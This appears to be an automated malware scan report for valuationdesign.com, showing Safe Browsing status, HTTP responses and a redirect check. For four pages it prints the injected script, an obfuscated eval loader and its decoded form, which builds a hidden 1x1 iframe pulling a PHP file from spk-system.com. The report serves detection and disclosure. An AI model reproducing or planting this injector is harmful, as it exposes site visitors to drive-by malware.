Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=valuationdesign.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://valuationdesign.com/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Fri, 26 Dec 2014 17:26:28 GMT Location: http://www.valuationdesign.com/ Server: Apache/2.2.3 (CentOS) Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 26 Dec 2014 18:26:28 GMT | clean |
http://www.valuationdesign.com/ | 200 OK Content-Length: 5906 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: spk-system.com try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e70737f7b782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e70737f7b783c8180712e4b2e357682827e483d3d817e793b81878182737b3c717d7b3d467e5f54725965663c7e767e35491b182e70737f7b783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e70737f7b783c8182877a733c707d80 ...[2448 bytes skipped]... Decoded script: String String function zzzfff() { var beqmj = document.createElement('iframe'); beqmj.src = 'http://spk-system.com/8pQFdKWX.php'; beqmj.style.position = 'absolute'; beqmj.style.border = '0'; beqmj.style.height = '1px'; beqmj.style.width = '1px'; beqmj.style.left = '1px'; beqmj.style.top = '1px'; if (!document.getElementById('beqmj')) { document.write('<div id=\'beqmj\'></div>'); document.getElementById('beqmj').appendChild(beqmj); } } function SetCookie(cookieName, ...[2518 bytes skipped]... | ||
http://www.valuationdesign.com/reasons.html | 200 OK Content-Length: 4154 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: spk-system.com try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e70737f7b782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e70737f7b783c8180712e4b2e357682827e483d3d817e793b81878182737b3c717d7b3d467e5f54725965663c7e767e35491b182e70737f7b783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e70737f7b783c8182877a733c707d80 ...[2448 bytes skipped]... Decoded script: String String function zzzfff() { var beqmj = document.createElement('iframe'); beqmj.src = 'http://spk-system.com/8pQFdKWX.php'; beqmj.style.position = 'absolute'; beqmj.style.border = '0'; beqmj.style.height = '1px'; beqmj.style.width = '1px'; beqmj.style.left = '1px'; beqmj.style.top = '1px'; if (!document.getElementById('beqmj')) { document.write('<div id=\'beqmj\'></div>'); document.getElementById('beqmj').appendChild(beqmj); } } function SetCookie(cookieName, ...[2518 bytes skipped]... | ||
http://www.valuationdesign.com/index.html | 200 OK Content-Length: 5906 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: spk-system.com try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e70737f7b782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e70737f7b783c8180712e4b2e357682827e483d3d817e793b81878182737b3c717d7b3d467e5f54725965663c7e767e35491b182e70737f7b783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e70737f7b783c8182877a733c707d80 ...[2448 bytes skipped]... Decoded script: String String function zzzfff() { var beqmj = document.createElement('iframe'); beqmj.src = 'http://spk-system.com/8pQFdKWX.php'; beqmj.style.position = 'absolute'; beqmj.style.border = '0'; beqmj.style.height = '1px'; beqmj.style.width = '1px'; beqmj.style.left = '1px'; beqmj.style.top = '1px'; if (!document.getElementById('beqmj')) { document.write('<div id=\'beqmj\'></div>'); document.getElementById('beqmj').appendChild(beqmj); } } function SetCookie(cookieName, ...[2518 bytes skipped]... | ||
http://www.valuationdesign.com/process.html | 200 OK Content-Length: 3849 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: spk-system.com try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e70737f7b782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e70737f7b783c8180712e4b2e357682827e483d3d817e793b81878182737b3c717d7b3d467e5f54725965663c7e767e35491b182e70737f7b783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e70737f7b783c8182877a733c707d80 ...[2448 bytes skipped]... Decoded script: String String function zzzfff() { var beqmj = document.createElement('iframe'); beqmj.src = 'http://spk-system.com/8pQFdKWX.php'; beqmj.style.position = 'absolute'; beqmj.style.border = '0'; beqmj.style.height = '1px'; beqmj.style.width = '1px'; beqmj.style.left = '1px'; beqmj.style.top = '1px'; if (!document.getElementById('beqmj')) { document.write('<div id=\'beqmj\'></div>'); document.getElementById('beqmj').appendChild(beqmj); } } function SetCookie(cookieName, ...[2518 bytes skipped]... | ||
http://www.valuationdesign.com/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://valuationdesign.com/process.html | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Fri, 26 Dec 2014 17:26:35 GMT Location: http://www.valuationdesign.com/process.html Server: Apache/2.2.3 (CentOS) Content-Length: 311 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 26 Dec 2014 18:26:35 GMT | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: valuationdesign.com
Result:
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Fri, 26 Dec 2014 17:26:28 GMT
Location: http://www.valuationdesign.com/
Server: Apache/2.2.3 (CentOS)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 26 Dec 2014 18:26:28 GMT
...299 bytes of data.
GET / HTTP/1.1
Host: valuationdesign.com
Result:
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Fri, 26 Dec 2014 17:26:28 GMT
Location: http://www.valuationdesign.com/
Server: Apache/2.2.3 (CentOS)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 26 Dec 2014 18:26:28 GMT
...299 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: valuationdesign.com
Referer: http://www.google.com/search?q=valuationdesign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: valuationdesign.com
Referer: http://www.google.com/search?q=valuationdesign.com
Result:
The result is similar to the first query. There are no suspicious redirects found.